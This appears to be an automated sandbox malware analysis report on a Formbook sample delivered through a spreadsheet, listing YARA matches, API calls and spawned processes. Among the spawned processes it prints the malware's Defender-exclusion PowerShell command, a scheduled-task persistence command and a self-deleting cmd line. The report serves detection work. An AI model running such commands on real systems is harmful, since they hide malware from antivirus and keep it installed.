          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.496796334.00000000092FB000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.506187794.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.473612536.00000000033E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0008A2A9
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F5928
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F5918
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F5B78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F63E7
          Source: C:\Users\Public\vbc.exeCode function: 4_2_002F17B0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0008A035
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0008A2A9
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E015
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D931
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041DAC3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E4F6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041E498
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D87
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041D5B6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00409E60
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041EF56
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADE0C6
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADE2E9
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B863BF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B063DB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE2305
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B2A37B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6443E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B605E3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AFC5F0
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B26540
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE4680
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEE6C1
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B2A634
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B82622
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEC7BC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0286D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AEC85C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE29B2
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B8098E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B749F5
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF69FE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B8CBA4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B66BCB
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B82C9C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6AC5E
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B10D3B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AECD5B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B12E2F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AFEE4C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7CFB1
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B52FDC
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF0F3F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0D005
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B5D06D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE3040
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF905A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6D13F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B81238
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADF3CF
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE7353
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AF1489
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B15485
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B1D47D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B835DA
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AE351F
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6579A
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B157C3
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7771D
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7F8EE
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B5F8C4
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B65955
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6394B
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B93A83
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6DBDA
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ADFBD7
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B07B00
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B7FDDD
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B6BF14
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00B0DF7C
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A036
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00361082
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00368912
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036B232
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00365B32
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00365B30
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00362D02
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036E5CD
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0008A035
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02641238
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259E2E9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A7353
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025EA37B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A2305
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C63DB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259F3CF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B905A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A3040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025CD005
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259E0C6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02642622
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AE6C1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A4680
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D57C3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AC7BC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0262579A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025DD47D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B1489
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D5485
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025E6540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A351F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025BC5F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02653A83
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C7B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259FBD7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0262DBDA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264CBA4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025AC85C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025C286D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0263F8EE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02625955
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B69FE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025A29B2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0264098E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025BEE4C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D2E2F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025CDF7C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025B0F3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025ACD5B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025D0D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0263FDDD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD5B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AD931
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000ADAC3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00099E60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00092FB0
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B23F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00ADE2A8 appears 60 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00ADDF5C appears 130 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B2373B appears 253 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 00B4F970 appears 84 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0260F970 appears 81 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0259DF5C appears 118 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0259E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025E3F92 appears 108 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 025E373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A370 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A420 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A4A0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A550 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A36B NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A41A NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0041A49C NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD01D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD07AC NtCreateMutant,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD0C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD10D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACF938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00AD1D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_00ACFF34 NtQueueApcThread,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 9_2_0036A042 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025900C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025907AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590078 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590060 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025910D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591148 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0259010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_025901D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02590C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0258FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_02591D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA370 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA420 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA4A0 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA550 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA36B NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA41A NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_000AA49C NtClose,
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
          Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: OmnbtuhFsJys.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Payment Details.xlsxVirustotal: Detection: 36%
          Source: Payment Details.xlsxReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................<.......................0.......;...............|.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................W.......................0.......;.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......x.......".......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................................................0.......G.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......s.J.y.s...e.x.e.................................................0......._.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............................:.......................0......._.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................q.......................0.......k.......................................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................................................0.......k.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......x.......2.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................@.......................0...............x...............................
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................[.......................0...............x...............................
          Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ..................(...............(.....(.P.....0.......(...............G.......................................................................
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OmnbtuhFsJys.exe
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OmnbtuhFsJys" /XML "C:\Users\user\AppData\Local\Temp\tmpC92A.tmp
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Payment Details.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD45E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@13/26@1/2
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
